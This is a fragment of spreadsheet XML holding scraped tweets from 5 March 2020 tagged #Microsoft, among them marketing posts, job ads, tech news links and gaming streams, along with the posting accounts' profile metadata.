    <t>{'id': 44371566, 'id_str': '44371566', 'name': 'A M M A R â€¢ H A S A Y E N', 'screen_name': 'ammarhasayen', 'location': 'Dubai, United Arab Emirates', 'description': 'Microsoft MVP MCT | Cloud &amp; Security Architect | Download my new book here: https://t.co/WBpQuw6UTp', 'url': 'https://t.co/8lmCNfgYZL', 'entities': {'url': {'urls': [{'url': 'https://t.co/8lmCNfgYZL', 'expanded_url': 'https://blog.ahasayen.com', 'display_url': 'blog.ahasayen.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/WBpQuw6UTp', 'expanded_url': 'https://me.ahasayen.com/cloud-migration/', 'display_url': 'me.ahasayen.com/cloud-migratioâ€¦', 'indices': [76, 99]}]}}, 'protected': False, 'followers_count': 1302, 'friends_count': 1315, 'listed_count': 71, 'created_at': 'Wed Jun 03 14:41:36 +0000 2009', 'favourites_count': 2856, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3223, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '090A0A', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme6/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme6/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1195629704985927680/FSJMyTT__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1195629704985927680/FSJMyTT__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/44371566/1573895291', 'profile_link_color': 'FF691F', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'A0C5C7', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 16:18:22 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft #Dynamics365 #CRM Partners, do your due diligence by expanding your product offerings for your #clients with Gravity Software https://t.co/VZ307ffZHF
#CRMOnline #D365 #MsPartner #Microsoft #Dyn365 #BusinessSoftware #Resellers #OutsourcedCFO #MicrosoftPartner #CRMMVP https://t.co/3xJvK8x4KN</t>
  </si>
  <si>
    <t>Thu Mar 05 16:17:57 +0000 2020</t>
  </si>
  <si>
    <t>#Interactive Yammer Emails in Outlook #OnTheWeb are here! #Internet https://t.co/MPCcVTHfbE #Microsoft #Office #Office365</t>
  </si>
  <si>
    <t>Thu Mar 05 16:14:40 +0000 2020</t>
  </si>
  <si>
    <t>I love it when you act tough with me. #Hudson   #microsoft #nxt https://t.co/WcsbfBteIC</t>
  </si>
  <si>
    <t>{'id': 1235321753808842753, 'id_str': '1235321753808842753', 'name': 'Nancy Brown', 'screen_name': 'psychopimhu', 'location': 'Paterson, USA', 'description': 'Love is that condition in which the happiness of another person is essential to your own', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 6, 'friends_count': 20, 'listed_count': 0, 'created_at': 'Wed Mar 04 21:50:37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'http://pbs.twimg.com/profile_images/1235346432166678528/nI-C9Dfa_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235346432166678528/nI-C9Dfa_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235321753808842753/1583364552',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</si>
  <si>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16:14:02 +0000 2020</t>
  </si>
  <si>
    <t>Free #resources for #remote #meetings, #working remotely, #virtual #collaboration #tools... 
#coronavirus #quarantine #work from #home #Cisco #Jabber #Webex #Microsoft #Google #LogMeIn #Teams #chat #hangouts #video   https://t.co/KweQF6dG4x</t>
  </si>
  <si>
    <t>{'id': 2898619055, 'id_str': '2898619055', 'name': 'Mischa Kischkum', 'screen_name': 'getmisch', 'location': 'New York City', 'description': "Sometimes actor (NBC, Comedy Central, Cannes), sometimes writer (songs, musicals, interactives), often geek. Always looking for what's next (#OriginalMisch)...", 'url': 'https://t.co/LFq6Jha3Tk', 'entities': {'url': {'urls': [{'url': 'https://t.co/LFq6Jha3Tk', 'expanded_url': 'http://www.fb.com/getmisch', 'display_url': 'fb.com/getmisch', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 87, 'friends_count': 357, 'listed_count': 1, 'created_at': 'Sun Nov 30 02:35:55 +0000 2014', 'favourites_count': 115, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 500,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'http://pbs.twimg.com/profile_images/1227402372571451392/kg0lcfnk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1227402372571451392/kg0lcfnk_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2898619055/1581470505',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</si>
  <si>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16:11:09 +0000 2020</t>
  </si>
  <si>
    <t>Boots and Tesco loyalty card schemes plagued by security issues https://t.co/XuaYoAJA4m via @Hybrid_Circle #Microsoft #VMware https://t.co/AeZjET8SEX</t>
  </si>
  <si>
    <t>{'id': 4047861143, 'id_str': '4047861143', 'name': 'HYBRID CIRCLE', 'screen_name': 'Hybrid_Circle', 'location': 'London, UK', 'description': 'A Leading IT Infrastructure, Cloud &amp; Consultancy Resourcing Partner in the UK. Technology Experts delivering #ITRecruitment #Azure #AWS â€“ Tel: 0333 666 666 0', 'url': 'https://t.co/E6kiGRnKYP', 'entities': {'url': {'urls': [{'url': 'https://t.co/E6kiGRnKYP', 'expanded_url': 'http://www.hybridcircle.co.uk', 'display_url': 'hybridcircle.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 591, 'friends_count': 2244, 'listed_count': 72, 'created_at': 'Mon Oct 26 18:10:18 +0000 2015', 'favourites_count': 447, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 9998,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'http://pbs.twimg.com/profile_images/677554516275916800/AxD9ZVSH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/677554516275916800/AxD9ZVSH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4047861143/1450376923',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</si>
  <si>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16:10:48 +0000 2020</t>
  </si>
  <si>
    <t>Join our upcoming webinar: https://t.co/6lJXJwhdwC 
Listen to Renaud Montes and Microsoft MVP Christian Buckley discuss the use of big data in increasing customer engagement and efficient task management in Microsoft 365.
#zen3 #microsoft #customerengagement #microsoftoffice365 https://t.co/pVujbVptsn</t>
  </si>
  <si>
    <t>{'id': 2445296677, 'id_str': '2445296677', 'name': 'Zen3 Infosolutions', 'screen_name': 'Zen3India', 'location': 'India,USA, London, Dubai', 'description': '@Zen3india is a global software solutions and technology consulting company, developing Smart solutions for Fortune 500 companies across various domains', 'url': 'http://t.co/2lL8Kxd9PM', 'entities': {'url': {'urls': [{'url': 'http://t.co/2lL8Kxd9PM', 'expanded_url': 'http://www.zen3.com', 'display_url': 'zen3.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 66, 'friends_count': 13, 'listed_count': 1, 'created_at': 'Tue Apr 15 11:09:31 +0000 2014', 'favourites_count': 4, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 112,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'http://pbs.twimg.com/profile_images/1117699167541841921/4no0N1o2_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1117699167541841921/4no0N1o2_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2445296677/1554904056', 'profile_link_color': '91D2FA',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</si>
  <si>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16:09:59 +0000 2020</t>
  </si>
  <si>
    <t>Prep for the MS-301 Exams and begin your path to earning #Microsoft 365 Teamwork Administrator certification with our Deploying SharePoint Server Hybrid (MS-301) course. Enroll now: https://t.co/4GHcfqrag5 #Microsoft365 #ITTraining #SharePoint https://t.co/tD1NvXYmXe</t>
  </si>
  <si>
    <t>{'id': 18805088, 'id_str': '18805088', 'name': 'Fast Lane US', 'screen_name': 'FastLaneUS', 'location': '', 'description': 'Authorized @Cisco, @NetApp, @VMware, @RedHat, @GCPCloud &amp; @AWSCloud training throughout the US and Canada. FlexPod Training provider.', 'url': 'https://t.co/dIY5BcFzpP', 'entities': {'url': {'urls': [{'url': 'https://t.co/dIY5BcFzpP', 'expanded_url': 'http://www.FastLaneUS.com', 'display_url': 'FastLaneUS.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3405, 'friends_count': 54, 'listed_count': 102, 'created_at': 'Fri Jan 09 16:07:46 +0000 2009', 'favourites_count': 978, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3904,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True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1230258518332235778/66AmIhPd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1230258518332235778/66AmIhPd_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18805088/1560195701', 'profile_link_color': 'FF0000', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'FFF7CC', 'profile_text_color': '0C3E53', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 16:09:55 +0000 2020</t>
  </si>
  <si>
    <t>This job might be a great fit for you: ASP Net Developer - https://t.co/N27MdCUiyU #Microsoft #MiraLoma, CA</t>
  </si>
  <si>
    <t>{'id': 27341773, 'id_str': '27341773', 'name': 'TMJ-CAO IT-.NET Jobs', 'screen_name': 'tmj_cao_itdnet', 'location': 'Orange County, CA', 'description': 'Follow this account for geo-targeted Software Dev.  - Microsoft Tools job tweets in Orange County, CA. Need help? Tweet us at @CareerArc!', 'url': 'https://t.co/nMJ4tlqeoA', 'entities': {'url': {'urls': [{'url': 'https://t.co/nMJ4tlqeoA', 'expanded_url': 'http://bit.ly/2Fm5dP5', 'display_url': 'bit.ly/2Fm5dP5', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 195, 'friends_count': 165, 'listed_count': 6, 'created_at': 'Sun Mar 29 00:19:24 +0000 2009', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3,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'http://pbs.twimg.com/profile_images/685345761429590017/mI4ktkdd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/685345761429590017/mI4ktkdd_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/27341773/1452234138',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</si>
  <si>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Thu Mar 05 16:07:33 +0000 2020</t>
  </si>
  <si>
    <t>After #JEDI #contract award #Amazon goes to war with #Microsoft via @dataeconomy https://t.co/CV0q8e1EVP</t>
  </si>
  <si>
    <t>{'id': 316693837, 'id_str': '316693837', 'name': 'Antony Savvas', 'screen_name': 'AntonySavvas', 'location': 'York, North Yorkshire', 'description': 'IT always needs looking at and I do it as an IT journalist, travelling across Europe and the US to do it.', 'url': 'http://t.co/9Tpo8HGFXr', 'entities': {'url': {'urls': [{'url': 'http://t.co/9Tpo8HGFXr', 'expanded_url': 'http://www.journalistdirectory.com/journalist/z/Antony-Savvas', 'display_url': 'journalistdirectory.com/journalist/z/Aâ€¦', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1993, 'friends_count': 1209, 'listed_count': 306, 'created_at': 'Mon Jun 13 20:41:18 +0000 2011', 'favourites_count': 249, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 9825,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'http://pbs.twimg.com/profile_images/378800000374135858/1b21d17f3c8c11ce1fe81f077e56a9b6_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000374135858/1b21d17f3c8c11ce1fe81f077e56a9b6_normal.jpeg',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</si>
  <si>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16:06:40 +0000 2020</t>
  </si>
  <si>
    <t>International Women's Day 2020 - The Women in Tech on Microsoft's ITOpsTalk team https://t.co/u1suNmcJju
#microsoft #itoperations #azure #cloudadvocates #opensource #msftadvocate</t>
  </si>
  <si>
    <t>{'id': 176927591, 'id_str': '176927591', 'name': 'Ignacio Quijas', 'screen_name': 'iquijas', 'location': '', 'description': 'An experienced professional with a unique combination of business and technical skills.', 'url': 'http://t.co/s57vLfuASH', 'entities': {'url': {'urls': [{'url': 'http://t.co/s57vLfuASH', 'expanded_url': 'http://connectedenterprise.wordpress.com', 'display_url': 'connectedenterprise.wordpress.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 175, 'friends_count': 228, 'listed_count': 9, 'created_at': 'Tue Aug 10 20:23:24 +0000 2010', 'favourites_count': 1865, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1932,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'http://pbs.twimg.com/profile_images/1174050055541723136/NXDp-cTG_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1174050055541723136/NXDp-cTG_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/176927591/1354056674',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</si>
  <si>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16:06:26 +0000 2020</t>
  </si>
  <si>
    <t>Hey look! It's Batman! I'll be playing Batman the Enemy Within starting at 4PM Eastern on https://t.co/6Dhv0hBC8W 
#Batman #Telltale #XboxOne #Microsoft #Xbox #xboxonex #xboxonexgames #xboxonegamer #Xboxonegames ##gameswithgold #twitch #catwoman #inst... https://t.co/EpIjY5M3aA https://t.co/UnD9YOgilW</t>
  </si>
  <si>
    <t>{'id': 16094536, 'id_str': '16094536', 'name': 'LepsLair on Twitch', 'screen_name': 'lepslair', 'location': 'Lewes, DE', 'description': '35 living in Delaware. Owner of #teamleps | he/him \nBusiness Email: leprakhauns@lepslair.com\nI stream Mondays Tuesdays Thursdays Fridays at 8PM Eastern', 'url': 'https://t.co/bmQkWJr8ST', 'entities': {'url': {'urls': [{'url': 'https://t.co/bmQkWJr8ST', 'expanded_url': 'http://twitch.tv/lepslair', 'display_url': 'twitch.tv/lepslair', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 53617, 'friends_count': 55641, 'listed_count': 177, 'created_at': 'Tue Sep 02 09:06:54 +0000 2008', 'favourites_count': 23397, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 65145,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'http://pbs.twimg.com/profile_images/1197789099052208129/yPolEfXp_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1197789099052208129/yPolEfXp_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/16094536/1574403672',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</si>
  <si>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16:05:17 +0000 2020</t>
  </si>
  <si>
    <t>Troubleshooting #Windows 10 Always On #VPN errors 691 and 812. #Microsoft #Windows10 #Win10 #aovpn #mobility https://t.co/pRNoEIf1S0</t>
  </si>
  <si>
    <t>Thu Mar 05 16:05:09 +0000 2020</t>
  </si>
  <si>
    <t>A First Look at #Microsofts New Windows 10X Operating System For Dual Screens via @Verge https://t.co/McZd1nY2Xi https://t.co/ZenWu02NXN</t>
  </si>
  <si>
    <t>{'id': 806295510, 'id_str': '806295510', 'name': 'No Problem Technologies', 'screen_name': 'NoProblemIT', 'location': 'London, England', 'description': 'Award Winning #ITSupport for #LondonBusinesses &amp; Home Users - affordable, fully managed IT services. For the latest #technews &amp; advice, follow us @NoProblemIT', 'url': 'https://t.co/2JoNWC53VL', 'entities': {'url': {'urls': [{'url': 'https://t.co/2JoNWC53VL', 'expanded_url': 'https://npit.co.uk/', 'display_url': 'npit.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3852, 'friends_count': 3388, 'listed_count': 33, 'created_at': 'Thu Sep 06 07:50:33 +0000 2012', 'favourites_count': 10, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1153225731503206400/fCFtg4uo_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1153225731503206400/fCFtg4uo_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/806295510/1563463939',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</si>
  <si>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16:04:37 +0000 2020</t>
  </si>
  <si>
    <t>via #Citrix Blogs: "Why URL filtering isnt enough for a zero-trust deployment: " https://t.co/AO1TqfOeSj
.
.
.
#blog #virtualization #cloudcomputing #cloud #security #microsoft #azure #citrix #citrixishow</t>
  </si>
  <si>
    <t>Thu Mar 05 16:04:27 +0000 2020</t>
  </si>
  <si>
    <t>After JEDI contract award Amazon goes to war with Microsoft | #DataEconomy https://t.co/a17P2YDx4R #AWS #Microsoft</t>
  </si>
  <si>
    <t>{'id': 339613727, 'id_str': '339613727', 'name': 'Data Economy', 'screen_name': 'dataeconomy', 'location': 'From London to the world', 'description': 'Defining data centres and cloud 24/7 through breaking news and reports from Data Economy. \n\nSubscribe for the latest here: https://t.co/fG2dqGv7RP', 'url': 'https://t.co/oi8rSr35yt', 'entities': {'url': {'urls': [{'url': 'https://t.co/oi8rSr35yt', 'expanded_url': 'http://www.data-economy.com', 'display_url': 'data-economy.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/fG2dqGv7RP', 'expanded_url': 'http://data-economy.com/subscribe/', 'display_url': 'data-economy.com/subscribe/', 'indices': [123, 146]}]}}, 'protected': False, 'followers_count': 20846, 'friends_count': 3403, 'listed_count': 715, 'created_at': 'Thu Jul 21 11:28:33 +0000 2011', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 25441,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'http://pbs.twimg.com/profile_images/1146778584104808448/x8LZr4-__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1146778584104808448/x8LZr4-__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/339613727/1581335736', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'F4F9FC', 'profile_text_color': '666666', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 16:03:28 +0000 2020</t>
  </si>
  <si>
    <t>If you think the #cloud means theres no longer a need to back up company data, you could be making a costly mistake.
Find out why you should be backing up Office 365 and other #SaaS platforms --&amp;gt; https://t.co/Tg6FSQYImD
#Microsoft #Office365backup #ITSupport #cybersecurity</t>
  </si>
  <si>
    <t>{'id': 85346256, 'id_str': '85346256', 'name': 'Mit Patel', 'screen_name': 'mitpatel1', 'location': 'London, England', 'description': 'Providing Competitive Edge for Business with IT', 'url': 'https://t.co/md8ZLAaKOw', 'entities': {'url': {'urls': [{'url': 'https://t.co/md8ZLAaKOw', 'expanded_url': 'http://www.netstar.co.uk', 'display_url': 'netstar.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 324, 'friends_count': 706, 'listed_count': 24, 'created_at': 'Mon Oct 26 15:55:19 +0000 2009', 'favourites_count': 289, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 695,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'http://pbs.twimg.com/profile_images/942364111660204032/6Xnt13d__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/942364111660204032/6Xnt13d__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/85346256/1457952601',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</si>
  <si>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16:03:19 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft #cloud      With @Office365, Archon Security, empowers you to access  content from any device, coauthor in real time and use #AI to create more impactful content with less effort. https://t.co/hkFpBeSmsl</t>
  </si>
  <si>
    <t>Thu Mar 05 16:03:17 +0000 2020</t>
  </si>
  <si>
    <t>If you think the #cloud means theres no longer a need to back up company data, you could be making a costly mistake. 
Find out why you should be backing up Office 365 and other #SaaS platforms --&amp;gt; https://t.co/ZkjgFEEqBz
#Microsoft #Office365backup #ITSupport #cybersecurity</t>
  </si>
  <si>
    <t>{'id': 132928804, 'id_str': '132928804', 'name': 'Netstar', 'screen_name': 'NetstarUK', 'location': 'London, United Kingdom', 'description': 'Managed IT Service provider with a proactive approach to boosting business productivity #ITSupport #London #Business â†’ Helping People Succeed Through Technology', 'url': 'https://t.co/kIXizyRLgB', 'entities': {'url': {'urls': [{'url': 'https://t.co/kIXizyRLgB', 'expanded_url': 'https://www.netstar.co.uk', 'display_url': 'netstar.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 864, 'friends_count': 1110, 'listed_count': 117, 'created_at': 'Wed Apr 14 15:09:50 +0000 2010', 'favourites_count': 139, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3206, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '0C4E7D', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme16/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme16/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1230839393751097344/7cvL8W6W_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1230839393751097344/7cvL8W6W_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/132928804/1582558996', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '419CEB', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 16:02:47 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft encourages Seattle area and Bay Area employees to work from home if possible through March 25th, asks sick employees to stay home https://t.co/zIBregQ2LS</t>
  </si>
  <si>
    <t>Thu Mar 05 16:01:42 +0000 2020</t>
  </si>
  <si>
    <t>My #YouTube videos about #Microsoft #excel gained more subscribers this week.
You may also like to LEARN EXCEL FREE IN URDU
https://t.co/KltciPWgLJ
#WeRejectMeraJismMeriMrzi</t>
  </si>
  <si>
    <t>{'id': 887339174008958976, 'id_str': '887339174008958976', 'name': 'SAM KHOKHAR', 'screen_name': 'SamDiary', 'location': 'Punjab, Pakistan', 'description': '\u200f\u200f\u200f\u200f\u200f\u200f\u200f\u200f\u200f\u200f\u200f\u200f ï·½\nï´¿Ø¥ÙÙ†ÙŽÙ‘ Ø§Ù„Ù„ÙŽÙ‘Ù‡ÙŽ ÙˆÙŽÙ…ÙŽÙ„ÙŽØ§Ø¦ÙÙƒÙŽØªÙ‡Ù ÙŠÙØµÙŽÙ„ÙÙ‘ÙˆÙ†ÙŽ Ø¹ÙŽÙ„Ù‰ Ø§Ù„Ù†ÙŽÙ‘Ø¨ÙŠÙ‘ ÙŠÙŽØ§ Ø£ÙŽÙŠÙÙ‘Ù‡Ø§Ø§Ù„ÙŽØ°ÙÙŠÙ†ÙŽ Ø¢ÙŽÙ…ÙŽÙ†ÙÙˆØ§ ØµÙŽÙ„ÙÙ‘ÙˆØ§Ø¹ÙŽÙ„ÙŠÙ’Ù‡ ÙˆØ³ÙŽÙ„ÙÙ‘Ù…ÙÙˆØ§ØªÙŽØ³Ù’Ù„ÙŠÙ…Ù‹Ø§ï´¾\n100% follow back', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1682, 'friends_count': 3296, 'listed_count': 2, 'created_at': 'Tue Jul 18 15:51:59 +0000 2017', 'favourites_count': 7610, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 14462,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'http://pbs.twimg.com/profile_images/1234851102937448454/KA0WXLP8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234851102937448454/KA0WXLP8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/887339174008958976/1553334845',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</si>
  <si>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16:01:20 +0000 2020</t>
  </si>
  <si>
    <t>Just finished my write up on securing public RDP in #Azure 
Security doesnt always come with cost and Ive tried to show a free alternative that just requires a little configuration. 
#Microsoft #Azure #Infosec #Cloud
https://t.co/NjcQwtG5vY</t>
  </si>
  <si>
    <t>{'id': 915384905374330880, 'id_str': '915384905374330880', 'name': 'Ash MoranðŸ’¤', 'screen_name': 'securethelogs', 'location': '', 'description': '#Blueteam, #InfraSec Engineer who runs the #infosec site: https://t.co/18Yfomm1QK / Lover of all things #PowerShell ðŸ’» : Github: https://t.co/8CId2bVN1L', 'url': 'https://t.co/EqobcRIbmn', 'entities': {'url': {'urls': [{'url': 'https://t.co/EqobcRIbmn', 'expanded_url': 'http://Securethelogs.com', 'display_url': 'Securethelogs.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/18Yfomm1QK', 'expanded_url': 'http://securethelogs.com/', 'display_url': 'securethelogs.com', 'indices': [58, 81]}, {'url': 'https://t.co/8CId2bVN1L', 'expanded_url': 'https://github.com/securethelogs', 'display_url': 'github.com/securethelogs', 'indices': [128, 151]}]}}, 'protected': False, 'followers_count': 112, 'friends_count': 1057, 'listed_count': 2, 'created_at': 'Wed Oct 04 01:15:43 +0000 2017', 'favourites_count': 515, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1467, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1211701689650221056/T1X3A-BJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1211701689650221056/T1X3A-BJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/915384905374330880/1579042549',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</si>
  <si>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16:00:49 +0000 2020</t>
  </si>
  <si>
    <t>Are you looking for a efficient #Admin Assistant with experience in #Microsoft office &amp;amp; skills in working as part of a team within a busy office environment? If you are interested, then contact the apprenticeship &amp;amp; employment team on 01244 656455 https://t.co/fGLpPXy3RD</t>
  </si>
  <si>
    <t>{'id': 954013934113165312, 'id_str': '954013934113165312', 'name': 'CCSW Apprenticeships', 'screen_name': 'CCSWApprentice', 'location': '', 'description': 'Official @cheshirecollsw Apprenticeships Page! Register your interest in becoming or hiring an Apprentice using the link below!', 'url': 'https://t.co/KQZ3odurBF', 'entities': {'url': {'urls': [{'url': 'https://t.co/KQZ3odurBF', 'expanded_url': 'https://www.ccsw.ac.uk/employers/apprenticeships/', 'display_url': 'ccsw.ac.uk/employers/apprâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 130, 'friends_count': 228, 'listed_count': 0, 'created_at': 'Thu Jan 18 15:33:41 +0000 2018', 'favourites_count': 141, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 835,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'http://pbs.twimg.com/profile_images/954015135596720128/UNopgoUq_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/954015135596720128/UNopgoUq_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/954013934113165312/1563371134',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</si>
  <si>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16:00:38 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft and #Cisco announced the "seamless integration" of the two companies' #InternetOfThings (#IoT) and cloud products, enabling more #edgecomputing scenarios. https://t.co/aXOQbQXXZX @RedmondPartner https://t.co/3HYbgnLtPZ</t>
  </si>
  <si>
    <t>{'id': 558613259, 'id_str': '558613259', 'name': 'Silicon IT Hub', 'screen_name': 'SiliconITHub', 'location': 'USA, UK, AU, India, Europe', 'description': 'Leading #Web &amp; #MobileAppDevelopment Company, Serving diversified industries worldwide #AppDevelopment #Website &amp; #eCommerce', 'url': 'http://t.co/eyuTAVNFnq', 'entities': {'url': {'urls': [{'url': 'http://t.co/eyuTAVNFnq', 'expanded_url': 'http://www.siliconithub.com', 'display_url': 'siliconithub.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 7478, 'friends_count': 2081, 'listed_count': 80, 'created_at': 'Fri Apr 20 12:58:01 +0000 2012', 'favourites_count': 365, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4286,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'http://pbs.twimg.com/profile_images/1121790078634692608/aoNkWKxZ_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1121790078634692608/aoNkWKxZ_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/558613259/1579257905', 'profile_link_color': 'FF691F',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</si>
  <si>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16:00:29 +0000 2020</t>
  </si>
  <si>
    <t>Oh Shit my little friend
#teammg #marriedgames #games #gaming #game #jogos #jogo #pc #console #computador #playstation #ps4 #xbox #xboxone #xboxonex #sony #microsoft #switch #nintendo #nintendogames #nintendoswitch #gamer https://t.co/BsXEC2S7k1</t>
  </si>
  <si>
